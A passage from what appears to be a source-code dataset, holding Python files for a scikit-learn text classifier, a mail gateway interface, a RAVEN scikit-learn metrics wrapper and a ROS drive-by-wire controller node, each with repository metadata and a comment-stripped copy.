                param_grid["class_weight"] if is_grid else [param_grid["class_weight"]]
            )
            # Translate label names in the class_weight dicts to encoded ids
            weights = [
                {
                    k
                    if isinstance(k, int)
                    else self._class_encoder.transform((k,))[0]: v
                    for k, v in cw_dict.items()
                }
                for cw_dict in raw_weights
            ]
            param_grid["class_weight"] = weights if is_grid else weights[0]
        elif "class_bias" in param_grid:
            # interpolate between class_bias=0 => class_weight=None
            # and class_bias=1 => class_weight='balanced'
            class_count = np.bincount(y)
            classes = self._class_encoder.classes_
            weights = []
            raw_bias = (
                param_grid["class_bias"] if is_grid else [param_grid["class_bias"]]
            )
            for class_bias in raw_bias:
                # these weights are same as sklearn's class_weight='balanced'
                balanced_w = [(len(y) / len(classes) / c) for c in class_count]
                balanced_tuples = list(zip(list(range(len(classes))), balanced_w))
                weights.append(
                    {c: (1 - class_bias) + class_bias * w for c, w in balanced_tuples}
                )
            param_grid["class_weight"] = weights if is_grid else weights[0]
            del param_grid["class_bias"]

        return param_grid

    def _get_feature_selector(self):
        """Get a feature selector instance based on the feature_selector model
        parameter

        Returns:
            (Object): a feature selector which returns a reduced feature matrix, \
                given the full feature matrix, X and the class labels, y
        """
        if self.config.model_settings is None:
            selector_type = None
        else:
            selector_type = self.config.model_settings.get("feature_selector")
        # NOTE(review): LogisticRegression(penalty="l1") requires a
        # liblinear/saga solver on newer scikit-learn releases — confirm
        # against the pinned sklearn version.
        selector = {
            "l1": SelectFromModel(LogisticRegression(penalty="l1", C=1)),
            "f": SelectPercentile(),
        }.get(selector_type)
        return selector

    def _get_feature_scaler(self):
        """Get a feature value scaler based on the model settings"""
        if self.config.model_settings is None:
            scale_type = None
        else:
            scale_type = self.config.model_settings.get("feature_scaler")
        scaler = {
            "std-dev": StandardScaler(with_mean=False),
            "max-abs": MaxAbsScaler(),
        }.get(scale_type)
        return scaler
register_model("text", TextModel)
| 37.004184 | 96 | 0.609 |
import logging
import operator
import random
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction import DictVectorizer
from sklearn.feature_selection import SelectFromModel, SelectPercentile
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import LabelEncoder as SKLabelEncoder
from sklearn.preprocessing import MaxAbsScaler, StandardScaler
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from .helpers import (
CHAR_NGRAM_FREQ_RSC,
QUERY_FREQ_RSC,
WORD_FREQ_RSC,
WORD_NGRAM_FREQ_RSC,
register_model,
)
from .model import EvaluatedExample, Model, StandardModelEvaluation
_NEG_INF = -1e10
LOG_REG_TYPE = "logreg"
DECISION_TREE_TYPE = "dtree"
RANDOM_FOREST_TYPE = "rforest"
SVM_TYPE = "svm"
SUPER_LEARNER_TYPE = "super-learner"
BASE_MODEL_TYPES = [LOG_REG_TYPE, DECISION_TREE_TYPE, RANDOM_FOREST_TYPE, SVM_TYPE]
ACCURACY_SCORING = "accuracy"
logger = logging.getLogger(__name__)
class TextModel(Model):
def __init__(self, config):
super().__init__(config)
self._class_encoder = SKLabelEncoder()
self._feat_vectorizer = DictVectorizer()
self._feat_selector = self._get_feature_selector()
self._feat_scaler = self._get_feature_scaler()
self._meta_type = None
self._meta_feat_vectorizer = DictVectorizer(sparse=False)
self._base_clfs = {}
self.cv_loss_ = None
self.train_acc_ = None
def __getstate__(self):
attributes = self.__dict__.copy()
attributes["_resources"] = {
rname: self._resources.get(rname, {})
for rname in [
WORD_FREQ_RSC,
QUERY_FREQ_RSC,
WORD_NGRAM_FREQ_RSC,
CHAR_NGRAM_FREQ_RSC,
]
}
return attributes
def _get_model_constructor(self):
classifier_type = self.config.model_settings["classifier_type"]
try:
return {
LOG_REG_TYPE: LogisticRegression,
DECISION_TREE_TYPE: DecisionTreeClassifier,
RANDOM_FOREST_TYPE: RandomForestClassifier,
SVM_TYPE: SVC,
}[classifier_type]
except KeyError as e:
msg = "{}: Classifier type {!r} not recognized"
raise ValueError(msg.format(self.__class__.__name__, classifier_type)) from e
def _get_cv_scorer(self, selection_settings):
return selection_settings.get("scoring", ACCURACY_SCORING)
def evaluate(self, examples, labels):
predictions = self.predict_proba(examples)
config = self._get_effective_config()
evaluations = [
EvaluatedExample(
e, labels[i], predictions[i][0], predictions[i][1], config.label_type
)
for i, e in enumerate(examples)
]
model_eval = StandardModelEvaluation(config, evaluations)
return model_eval
def fit(self, examples, labels, params=None):
params = params or self.config.params
skip_param_selection = params is not None or self.config.param_selection is None
indices = list(range(len(labels)))
random.shuffle(indices)
examples = [examples[i] for i in indices]
labels = [labels[i] for i in indices]
distinct_labels = set(labels)
if len(set(distinct_labels)) <= 1:
return self
y = self._label_encoder.encode(labels)
X, y, groups = self.get_feature_matrix(examples, y, fit=True)
if skip_param_selection:
self._clf = self._fit(X, y, params)
self._current_params = params
else:
best_clf, best_params = self._fit_cv(X, y, groups)
self._clf = best_clf
self._current_params = best_params
return self
def select_params(self, examples, labels, selection_settings=None):
y = self._label_encoder.encode(labels)
X, y, groups = self.get_feature_matrix(examples, y, fit=True)
clf, params = self._fit_cv(X, y, groups, selection_settings)
self._clf = clf
return params
def _fit(self, examples, labels, params=None):
params = self._convert_params(params, labels, is_grid=False)
model_class = self._get_model_constructor()
params = self._clean_params(model_class, params)
return model_class(**params).fit(examples, labels)
def predict(self, examples, dynamic_resource=None):
X, _, _ = self.get_feature_matrix(examples, dynamic_resource=dynamic_resource)
y = self._clf.predict(X)
predictions = self._class_encoder.inverse_transform(y)
return self._label_encoder.decode(predictions)
def predict_proba(self, examples, dynamic_resource=None):
X, _, _ = self.get_feature_matrix(examples, dynamic_resource=dynamic_resource)
return self._predict_proba(X, self._clf.predict_proba)
def predict_log_proba(self, examples, dynamic_resource=None):
X, _, _ = self.get_feature_matrix(examples, dynamic_resource=dynamic_resource)
predictions = self._predict_proba(X, self._clf.predict_log_proba)
for row in predictions:
_, probas = row
for label, proba in probas.items():
if proba == -np.Infinity:
probas[label] = _NEG_INF
return predictions
def view_extracted_features(self, example, dynamic_resource=None):
return self._extract_features(
example, dynamic_resource=dynamic_resource, tokenizer=self.tokenizer
)
def _get_feature_weight(self, feat_name, label_class):
if len(self._class_encoder.classes_) == 2 and label_class >= 1:
return np.array([0.0])
else:
return self._clf.coef_[
label_class, self._feat_vectorizer.vocabulary_[feat_name]
]
def inspect(self, example, gold_label=None, dynamic_resource=None):
if not isinstance(self._clf, LogisticRegression):
logging.warning(
"Currently inspection is only available for Logistic Regression Model"
)
return []
try:
gold_class = self._class_encoder.transform([gold_label])
except ValueError:
logger.warning("Unable to decode label `%s`", gold_label)
gold_class = None
pred_label = self.predict([example], dynamic_resource=dynamic_resource)[0]
pred_class = self._class_encoder.transform([pred_label])
features = self._extract_features(
example, dynamic_resource=dynamic_resource, tokenizer=self.tokenizer
)
logging.info("Predicted: %s.", pred_label)
if gold_class is None:
columns = ["Feature", "Value", "Pred_W({0})".format(pred_label), "Pred_P"]
else:
columns = [
"Feature",
"Value",
"Pred_W({0})".format(pred_label),
"Pred_P",
"Gold_W({0})".format(gold_label),
"Gold_P",
"Diff",
]
logging.info("Gold: %s.", gold_label)
inspect_table = [columns]
# Get all active features sorted alphabetically by name
features = sorted(features.items(), key=operator.itemgetter(0))
for feature in features:
feat_name = feature[0]
feat_value = feature[1]
# Features we haven't seen before won't be in our vectorizer
# e.g., an exact match feature for a query we've never seen before
if feat_name not in self._feat_vectorizer.vocabulary_:
continue
weight = self._get_feature_weight(feat_name, pred_class)
product = feat_value * weight
if gold_class is None:
row = [
feat_name,
round(feat_value, 4),
weight.round(4),
product.round(4),
"-",
"-",
"-",
]
else:
gold_w = self._get_feature_weight(feat_name, gold_class)
gold_p = feat_value * gold_w
diff = gold_p - product
row = [
feat_name,
round(feat_value, 4),
weight.round(4),
product.round(4),
gold_w.round(4),
gold_p.round(4),
diff.round(4),
]
inspect_table.append(row)
return inspect_table
def _predict_proba(self, X, predictor):
predictions = []
for row in predictor(X):
probabilities = {}
top_class = None
for class_index, proba in enumerate(row):
raw_class = self._class_encoder.inverse_transform([class_index])[0]
decoded_class = self._label_encoder.decode([raw_class])[0]
probabilities[decoded_class] = proba
if proba > probabilities.get(top_class, -1.0):
top_class = decoded_class
predictions.append((top_class, probabilities))
return predictions
def get_feature_matrix(self, examples, y=None, fit=False, dynamic_resource=None):
groups = []
feats = []
for idx, example in enumerate(examples):
feats.append(
self._extract_features(example, dynamic_resource, self.tokenizer)
)
groups.append(idx)
X, y = self._preprocess_data(feats, y, fit=fit)
return X, y, groups
def _preprocess_data(self, X, y=None, fit=False):
if fit:
y = self._class_encoder.fit_transform(y)
X = self._feat_vectorizer.fit_transform(X)
if self._feat_scaler is not None:
X = self._feat_scaler.fit_transform(X)
if self._feat_selector is not None:
X = self._feat_selector.fit_transform(X, y)
else:
X = self._feat_vectorizer.transform(X)
if self._feat_scaler is not None:
X = self._feat_scaler.transform(X)
if self._feat_selector is not None:
X = self._feat_selector.transform(X)
return X, y
def _convert_params(self, param_grid, y, is_grid=True):
if "class_weight" in param_grid:
raw_weights = (
param_grid["class_weight"] if is_grid else [param_grid["class_weight"]]
)
weights = [
{
k
if isinstance(k, int)
else self._class_encoder.transform((k,))[0]: v
for k, v in cw_dict.items()
}
for cw_dict in raw_weights
]
param_grid["class_weight"] = weights if is_grid else weights[0]
elif "class_bias" in param_grid:
class_count = np.bincount(y)
classes = self._class_encoder.classes_
weights = []
raw_bias = (
param_grid["class_bias"] if is_grid else [param_grid["class_bias"]]
)
for class_bias in raw_bias:
balanced_w = [(len(y) / len(classes) / c) for c in class_count]
balanced_tuples = list(zip(list(range(len(classes))), balanced_w))
weights.append(
{c: (1 - class_bias) + class_bias * w for c, w in balanced_tuples}
)
param_grid["class_weight"] = weights if is_grid else weights[0]
del param_grid["class_bias"]
return param_grid
def _get_feature_selector(self):
if self.config.model_settings is None:
selector_type = None
else:
selector_type = self.config.model_settings.get("feature_selector")
selector = {
"l1": SelectFromModel(LogisticRegression(penalty="l1", C=1)),
"f": SelectPercentile(),
}.get(selector_type)
return selector
def _get_feature_scaler(self):
if self.config.model_settings is None:
scale_type = None
else:
scale_type = self.config.model_settings.get("feature_scaler")
scaler = {
"std-dev": StandardScaler(with_mean=False),
"max-abs": MaxAbsScaler(),
}.get(scale_type)
return scaler
register_model("text", TextModel)
| true | true |
f7fa44a77c0ababe4dea55be8f086fb223ae61c2 | 280 | py | Python | autovirt/mail/interface/mail.py | xlam/autovirt | a19f9237c8b1123ce4f4b8b396dc88122019d4f8 | [
"MIT"
] | null | null | null | autovirt/mail/interface/mail.py | xlam/autovirt | a19f9237c8b1123ce4f4b8b396dc88122019d4f8 | [
"MIT"
] | null | null | null | autovirt/mail/interface/mail.py | xlam/autovirt | a19f9237c8b1123ce4f4b8b396dc88122019d4f8 | [
"MIT"
] | null | null | null | import abc
from autovirt.structs import Message
class MailGateway(abc.ABC):
@abc.abstractmethod
def get_messages_by_subject(self, subject: str) -> list[Message]:
pass
@abc.abstractmethod
def delete_messages(self, messages: list[Message]):
pass
| 20 | 69 | 0.703571 | import abc
from autovirt.structs import Message
class MailGateway(abc.ABC):
@abc.abstractmethod
def get_messages_by_subject(self, subject: str) -> list[Message]:
pass
@abc.abstractmethod
def delete_messages(self, messages: list[Message]):
pass
| true | true |
f7fa451ddd286b694225e6d832e26e4b1b0e775d | 8,237 | py | Python | ravenframework/Metrics/metrics/SklMetric.py | khurrumsaleem/raven | 3a158f9ae3851d3eca51b4bd91ea6494e5c0ed89 | [
"Apache-2.0"
] | null | null | null | ravenframework/Metrics/metrics/SklMetric.py | khurrumsaleem/raven | 3a158f9ae3851d3eca51b4bd91ea6494e5c0ed89 | [
"Apache-2.0"
] | null | null | null | ravenframework/Metrics/metrics/SklMetric.py | khurrumsaleem/raven | 3a158f9ae3851d3eca51b4bd91ea6494e5c0ed89 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on August 20 2016
@author: mandd
"""
#External Modules------------------------------------------------------------------------------------
import numpy as np
import ast
#External Modules End--------------------------------------------------------------------------------
#Internal Modules------------------------------------------------------------------------------------
from ...utils import utils
from .MetricInterface import MetricInterface
from ...utils import InputData, InputTypes
#Internal Modules End--------------------------------------------------------------------------------
class SKL(MetricInterface):
"""
Scikit-learn metrics
"""
availMetrics ={}
@classmethod
def getInputSpecification(cls):
"""
Method to get a reference to a class that specifies the input data for
class cls.
@ In, cls, the class for which we are retrieving the specification
@ Out, inputSpecification, InputData.ParameterInput, class to use for
specifying input of cls.
"""
inputSpecification = super().getInputSpecification()
inputSpecification.addSub(InputData.parameterInputFactory("metricType",contentType=InputTypes.StringType),quantity=InputData.Quantity.one)
inputSpecification.addSub(InputData.parameterInputFactory("sample_weight",contentType=InputTypes.FloatListType),quantity=InputData.Quantity.zero_to_one)
return inputSpecification
def __init__(self):
"""
Constructor
@ In, None
@ Out, None
"""
super().__init__()
if len(self.availMetrics) == 0:
import sklearn
import sklearn.metrics
# FIXME: median_absolute_error only accepts 1-D numpy array, and if we want to use this metric, it should
# be handled differently.
#from sklearn.metrics import median_absolute_error
# regression metrics
self.availMetrics['regression'] = {}
self.availMetrics['regression']['explained_variance_score'] = sklearn.metrics.explained_variance_score
self.availMetrics['regression']['mean_absolute_error'] = sklearn.metrics.mean_absolute_error
self.availMetrics['regression']['r2_score'] = sklearn.metrics.r2_score
self.availMetrics['regression']['mean_squared_error'] = sklearn.metrics.mean_squared_error
# paired distance metrics, no weights
if int(sklearn.__version__.split(".")[1]) > 17:
self.availMetrics['paired_distance'] = {}
self.availMetrics['paired_distance']['euclidean'] = sklearn.metrics.pairwise.paired_euclidean_distances
self.availMetrics['paired_distance']['manhattan'] = sklearn.metrics.pairwise.paired_manhattan_distances
self.availMetrics['paired_distance']['cosine'] = sklearn.metrics.pairwise.paired_cosine_distances
# TODO: add more metrics here
# metric from scipy.spatial.distance, for example mahalanobis, minkowski
# The type of given metric, None or List of two elements, first element should be in availMetrics.keys()
# and sencond element should be in availMetrics.values()[firstElement].keys()
self.metricType = None
# True indicates the metric needs to be able to handle dynamic data
self._dynamicHandling = True
def handleInput(self, paramInput):
"""
Method that reads the portion of the xml input that belongs to this specialized class
and initializes internal parameters
@ In, paramInput, InputData.parameterInput, input specs
@ Out, None
"""
self.distParams = {}
for child in paramInput.subparts:
if child.getName() == "metricType":
self.metricType = list(elem.strip() for elem in child.value.split('|'))
if len(self.metricType) != 2:
self.raiseAnError(IOError, "Metric type: '", child.value, "' is not correct, please check the user manual for the correct metric type!")
else:
self.distParams[child.getName()] = child.value
if self.metricType[0] not in self.__class__.availMetrics.keys() or self.metricType[1] not in self.__class__.availMetrics[self.metricType[0]].keys():
self.raiseAnError(IOError, "Metric '", self.name, "' with metricType '", self.metricType[0], "|", self.metricType[1], "' is not valid!")
  def run(self, x, y, weights=None, axis=0, **kwargs):
    """
      This method computes difference between two points x and y based on given metric
      @ In, x, numpy.ndarray, array containing data of x, if 1D array is provided,
        the array will be reshaped via x.reshape(-1,1) for paired_distance, shape (n_samples, ), if 2D
        array is provided, shape (n_samples, n_outputs)
      @ In, y, numpy.ndarray, array containing data of y, if 1D array is provided,
        the array will be reshaped via y.reshape(-1,1), shape (n_samples, ), if 2D
        array is provided, shape (n_samples, n_outputs)
      @ In, weights, array_like (numpy.array or list), optional, weights associated
        with input, shape (n_samples) if axis = 0, otherwise shape (n_outputs)
      @ In, axis, integer, optional, axis along which a metric is performed, default is 0,
        i.e. the metric will be performed along the first dimension (the "rows").
        If metric postprocessor is used, the first dimension is the RAVEN_sample_ID,
        and the second dimension is the pivotParameter if HistorySet is provided.
      @ In, kwargs, dict, dictionary of parameters characteristic of each metric
      @ Out, value, numpy.ndarray, metric result, shape (n_outputs) if axis = 0, otherwise
        shape (n_samples), we assume the dimension of input numpy.ndarray is no more than 2.
    """
    #######################################################################################
    # The inputs of regression metric, i.e. x, y should have shape (n_samples, n_outputs),
    # and the outputs will have the shape (n_outputs).
    # However, the inputs of paired metric, i.e. x, y should convert the shape to
    # (n_outputs, n_samples), and the outputs will have the shape (n_outputs).
    #######################################################################################
    assert(isinstance(x,np.ndarray)) # NOTE these assertions will not show up for non-debug runs!
    assert(isinstance(y,np.ndarray))
    assert(x.shape == y.shape), "Input data x, y should have the same shape"
    # caller-provided weights are forwarded to sklearn as 'sample_weight' unless
    # the XML input already supplied one
    if weights is not None and self.metricType[0] == 'regression' and 'sample_weight' not in self.distParams.keys():
      self.distParams['sample_weight'] = weights
    if self.metricType[0] == 'regression':
      # 'raw_values' makes sklearn return one score per output instead of an average
      self.distParams['multioutput'] = 'raw_values'
    dictTemp = utils.mergeDictionaries(kwargs,self.distParams)
    if self.metricType[0] == 'paired_distance':
      if len(x.shape) == 1:
        x = x.reshape(-1,1)
        y = y.reshape(-1,1)
      else:
        # Transpose is needed, since paired_distance is operated on the 'row'
        x = x.T
        y = y.T
    if axis == 1:
      x = x.T
      y = y.T
      # check the dimension of weights
      assert(x.shape[0] == len(weights)), "'weights' should have the same length of the first dimension of input data"
    elif axis != 0:
      self.raiseAnError(IOError, "Valid axis value should be '0' or '1' for the evaluate method of metric", self. name, "value", axis, "is provided!")
    try:
      # dispatch to the registered sklearn callable for [family][name]
      value = self.__class__.availMetrics[self.metricType[0]][self.metricType[1]](x, y, **dictTemp)
    except TypeError as e:
      self.raiseAWarning('There are some unexpected keyword arguments found in Metric with type "', self.metricType[1], '"!')
      self.raiseAnError(TypeError,'Input parameters error:\n', str(e), '\n')
    return value
| 51.48125 | 156 | 0.653272 |
import numpy as np
import ast
from ...utils import utils
from .MetricInterface import MetricInterface
from ...utils import InputData, InputTypes
class SKL(MetricInterface):
availMetrics ={}
  @classmethod
  def getInputSpecification(cls):
    """
      Define the acceptable user inputs for this class.
      @ In, cls, class instance
      @ Out, inputSpecification, InputData.ParameterInput, specification instance
    """
    inputSpecification = super().getInputSpecification()
    # exactly one <metricType> node is required; <sample_weight> is optional
    inputSpecification.addSub(InputData.parameterInputFactory("metricType",contentType=InputTypes.StringType),quantity=InputData.Quantity.one)
    inputSpecification.addSub(InputData.parameterInputFactory("sample_weight",contentType=InputTypes.FloatListType),quantity=InputData.Quantity.zero_to_one)
    return inputSpecification
  def __init__(self):
    """
      Constructor.
      @ In, None
      @ Out, None
    """
    super().__init__()
    # Lazily fill the class-level registry on first instantiation so that
    # sklearn is only imported when an SKL metric is actually used.
    if len(self.availMetrics) == 0:
      import sklearn
      import sklearn.metrics
      self.availMetrics['regression'] = {}
      self.availMetrics['regression']['explained_variance_score'] = sklearn.metrics.explained_variance_score
      self.availMetrics['regression']['mean_absolute_error'] = sklearn.metrics.mean_absolute_error
      self.availMetrics['regression']['r2_score'] = sklearn.metrics.r2_score
      self.availMetrics['regression']['mean_squared_error'] = sklearn.metrics.mean_squared_error
      # paired-distance metrics are only registered for sklearn minor version > 17 (i.e. >= 0.18)
      if int(sklearn.__version__.split(".")[1]) > 17:
        self.availMetrics['paired_distance'] = {}
        self.availMetrics['paired_distance']['euclidean'] = sklearn.metrics.pairwise.paired_euclidean_distances
        self.availMetrics['paired_distance']['manhattan'] = sklearn.metrics.pairwise.paired_manhattan_distances
        self.availMetrics['paired_distance']['cosine'] = sklearn.metrics.pairwise.paired_cosine_distances
    # [family, name] parsed from the <metricType> node, e.g. ['regression', 'r2_score']
    self.metricType = None
    # True indicates the metric needs to be able to handle dynamic data
    self._dynamicHandling = True
  def handleInput(self, paramInput):
    """
      Read the portion of the XML input belonging to this class and
      initialize internal parameters.
      @ In, paramInput, InputData.parameterInput, input specs
      @ Out, None
    """
    self.distParams = {}
    for child in paramInput.subparts:
      if child.getName() == "metricType":
        # metricType is given as "family|name", e.g. "regression|r2_score"
        self.metricType = list(elem.strip() for elem in child.value.split('|'))
        if len(self.metricType) != 2:
          self.raiseAnError(IOError, "Metric type: '", child.value, "' is not correct, please check the user manual for the correct metric type!")
      else:
        # all other nodes are forwarded verbatim to the sklearn call
        self.distParams[child.getName()] = child.value
    if self.metricType[0] not in self.__class__.availMetrics.keys() or self.metricType[1] not in self.__class__.availMetrics[self.metricType[0]].keys():
      self.raiseAnError(IOError, "Metric '", self.name, "' with metricType '", self.metricType[0], "|", self.metricType[1], "' is not valid!")
def run(self, x, y, weights=None, axis=0, **kwargs):
| true | true |
f7fa45ab027269032a18ee9b788e4395c7ec595c | 4,996 | py | Python | ros/src/twist_controller/dbw_node.py | Az4z3l/CarND-SuperAI-Capstone | a9b96618bcfb1a93a8e332b4132f3b7ce0213d4f | [
"MIT"
] | 1 | 2020-06-30T10:40:32.000Z | 2020-06-30T10:40:32.000Z | ros/src/twist_controller/dbw_node.py | Az4z3l/CarND-SuperAI-Capstone | a9b96618bcfb1a93a8e332b4132f3b7ce0213d4f | [
"MIT"
] | null | null | null | ros/src/twist_controller/dbw_node.py | Az4z3l/CarND-SuperAI-Capstone | a9b96618bcfb1a93a8e332b4132f3b7ce0213d4f | [
"MIT"
] | 2 | 2020-03-19T12:58:56.000Z | 2020-07-10T09:14:58.000Z | #!/usr/bin/env python
import rospy
from std_msgs.msg import Bool
from dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport
from geometry_msgs.msg import TwistStamped
import math
from twist_controller import Controller
'''
This node will subscribe:
'dbw_enabled' --------> Boolean value represent whether dbw is enabled.
'throttle_cmd' -------> Proposed linear and angular velocity.
'current_velocity' ---> Current vehicle velocity.
This node will publish:
'steering_cmd' -------> Steer angle.
'ThrottleCmd' --------> Accelerate value.
'BrakeCmd' -----------> Brake torque.
'''
PUBLISH_RATE = 50
GAS_DENSITY = 2.858
ONE_MPH = 0.44704
class VehicleParams(object):
    """Plain container for the ego vehicle's physical parameters.

    Every field starts as None; DBWNode fills them in from the ROS
    parameter server during node start-up.
    """

    _PARAM_NAMES = ('vehicle_mass', 'fuel_capacity', 'brake_deadband',
                    'decel_limit', 'accel_limit', 'wheel_radius',
                    'wheel_base', 'steer_ratio', 'max_lat_accel',
                    'max_steer_angle', 'total_vehicle_mass')

    def __init__(self):
        # Initialize every known parameter slot to "unset".
        for name in self._PARAM_NAMES:
            setattr(self, name, None)
class DBWNode(object):
    """Drive-by-wire node.

    Subscribes to the proposed twist, the current velocity and the
    drive-by-wire-enabled flag; runs the `Controller`; and publishes
    throttle / brake / steering commands at PUBLISH_RATE Hz while DBW
    is engaged.
    """

    def __init__(self):
        rospy.init_node('dbw_node')

        # Vehicle-specific physical parameters from the ROS parameter server.
        ego_params = VehicleParams()
        ego_params.vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35)
        ego_params.fuel_capacity = rospy.get_param('~fuel_capacity', 13.5)
        ego_params.brake_deadband = rospy.get_param('~brake_deadband', .1)
        ego_params.decel_limit = rospy.get_param('~decel_limit', -5)
        ego_params.accel_limit = rospy.get_param('~accel_limit', 1.)
        ego_params.wheel_radius = rospy.get_param('~wheel_radius', 0.2413)
        ego_params.wheel_base = rospy.get_param('~wheel_base', 2.8498)
        ego_params.steer_ratio = rospy.get_param('~steer_ratio', 14.8)
        ego_params.max_lat_accel = rospy.get_param('~max_lat_accel', 3.)
        ego_params.max_steer_angle = rospy.get_param('~max_steer_angle', 8.)
        # Account for a full fuel tank in the mass used for brake torque.
        ego_params.total_vehicle_mass = ego_params.vehicle_mass + ego_params.fuel_capacity * GAS_DENSITY

        self.steer_pub = rospy.Publisher('/vehicle/steering_cmd', SteeringCmd, queue_size=1)
        self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd', ThrottleCmd, queue_size=1)
        self.brake_pub = rospy.Publisher('/vehicle/brake_cmd', BrakeCmd, queue_size=1)

        # Create "Controller" object, will return throttle, brake, steering.
        self.controller = Controller(vehicle_params=ego_params)

        self.current_vel = None
        self.curr_ang_vel = None
        self.dbw_enabled = True
        self.linear_vel = None
        self.angular_vel = None
        self.throttle = self.steering = self.brake = 0

        # Subscribers
        rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb)
        rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb)
        rospy.Subscriber('/current_velocity', TwistStamped, self.velocity_cb)

        self.loop()

    def loop(self):
        '''
        Calculate the upcoming throttle, brake, and steering information.
        Publish the calculated information.
        Calculation and publish information all based on the set rate (50Hz).
        '''
        rate = rospy.Rate(PUBLISH_RATE)
        while not rospy.is_shutdown():
            if None not in (self.current_vel, self.linear_vel, self.angular_vel):
                self.throttle, self.brake, self.steering = self.controller.control(self.current_vel,
                                                                                   self.dbw_enabled,
                                                                                   self.linear_vel,
                                                                                   self.angular_vel)
            # Only publish while drive-by-wire is engaged; when the safety
            # driver is in control the actuators must not be commanded.
            if self.dbw_enabled:
                self.publish(self.throttle, self.brake, self.steering)
            rate.sleep()

    def dbw_enabled_cb(self, msg):
        '''Callback for /vehicle/dbw_enabled (std_msgs/Bool).

        BUGFIX: store the boolean payload ``msg.data`` rather than the message
        object itself.  A message instance is always truthy, so the old code
        kept publishing (and never told the controller DBW was off) after the
        safety driver took over.
        '''
        self.dbw_enabled = msg.data

    def twist_cb(self, msg):
        '''Callback for /twist_cmd: proposed linear and angular velocity.'''
        self.linear_vel = msg.twist.linear.x
        self.angular_vel = msg.twist.angular.z

    def velocity_cb(self, msg):
        '''Callback for /current_velocity: measured forward speed.'''
        self.current_vel = msg.twist.linear.x

    def publish(self, throttle, brake, steer):
        '''
        Given throttle, brake, steer values,
        publish these values through 'throttle_cmd', 'brake_cmd' ,'steering_cmd' separately.
        '''
        tcmd = ThrottleCmd()
        tcmd.enable = True
        tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT
        tcmd.pedal_cmd = throttle
        self.throttle_pub.publish(tcmd)

        scmd = SteeringCmd()
        scmd.enable = True
        scmd.steering_wheel_angle_cmd = steer
        self.steer_pub.publish(scmd)

        bcmd = BrakeCmd()
        bcmd.enable = True
        bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE
        bcmd.pedal_cmd = brake
        self.brake_pub.publish(bcmd)
if __name__ == '__main__':
    try:
        DBWNode()
    except rospy.ROSInterruptException:
        # rospy raises this when the node is interrupted (e.g. Ctrl-C)
        # while sleeping; log instead of dumping a traceback.
        rospy.logerr('Could not start dbw node.')
| 35.685714 | 104 | 0.635909 |
import rospy
from std_msgs.msg import Bool
from dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport
from geometry_msgs.msg import TwistStamped
import math
from twist_controller import Controller
PUBLISH_RATE = 50
GAS_DENSITY = 2.858
ONE_MPH = 0.44704
class VehicleParams(object):
    """Container for the ego vehicle's physical parameters.

    All fields start as None; DBWNode.__init__ fills them from the ROS
    parameter server.
    """

    def __init__(self):
        self.vehicle_mass = None
        self.fuel_capacity = None
        self.brake_deadband = None
        self.decel_limit = None
        self.accel_limit = None
        self.wheel_radius = None
        self.wheel_base = None
        self.steer_ratio = None
        self.max_lat_accel = None
        self.max_steer_angle = None
        # vehicle_mass + fuel_capacity * GAS_DENSITY, computed by DBWNode.
        self.total_vehicle_mass = None
class DBWNode(object):
    """Drive-by-wire node: turns twist commands into throttle/brake/steering
    commands published at PUBLISH_RATE Hz."""

    def __init__(self):
        rospy.init_node('dbw_node')

        # Vehicle parameters, read from the ROS parameter server.
        ego_params = VehicleParams()
        ego_params.vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35)
        ego_params.fuel_capacity = rospy.get_param('~fuel_capacity', 13.5)
        ego_params.brake_deadband = rospy.get_param('~brake_deadband', .1)
        ego_params.decel_limit = rospy.get_param('~decel_limit', -5)
        ego_params.accel_limit = rospy.get_param('~accel_limit', 1.)
        ego_params.wheel_radius = rospy.get_param('~wheel_radius', 0.2413)
        ego_params.wheel_base = rospy.get_param('~wheel_base', 2.8498)
        ego_params.steer_ratio = rospy.get_param('~steer_ratio', 14.8)
        ego_params.max_lat_accel = rospy.get_param('~max_lat_accel', 3.)
        ego_params.max_steer_angle = rospy.get_param('~max_steer_angle', 8.)
        # Include fuel mass in the total used by the controller.
        ego_params.total_vehicle_mass = ego_params.vehicle_mass + ego_params.fuel_capacity * GAS_DENSITY

        self.steer_pub = rospy.Publisher('/vehicle/steering_cmd', SteeringCmd, queue_size=1)
        self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd', ThrottleCmd, queue_size=1)
        self.brake_pub = rospy.Publisher('/vehicle/brake_cmd', BrakeCmd, queue_size=1)

        self.controller = Controller(vehicle_params=ego_params)

        self.current_vel = None
        self.curr_ang_vel = None
        self.dbw_enabled = True
        self.linear_vel = None
        self.angular_vel = None
        self.throttle = self.steering = self.brake = 0

        rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb)
        rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb)
        rospy.Subscriber('/current_velocity', TwistStamped, self.velocity_cb)

        # Blocks here until ROS shutdown.
        self.loop()

    def loop(self):
        """Compute and publish throttle/brake/steering at PUBLISH_RATE Hz."""
        rate = rospy.Rate(PUBLISH_RATE)
        while not rospy.is_shutdown():
            if not None in(self.current_vel, self.linear_vel, self.angular_vel):
                self.throttle, self.brake, self.steering = self.controller.control(self.current_vel,
                                                                                   self.dbw_enabled,
                                                                                   self.linear_vel,
                                                                                   self.angular_vel)
            if self.dbw_enabled:
                self.publish(self.throttle, self.brake, self.steering)
            rate.sleep()

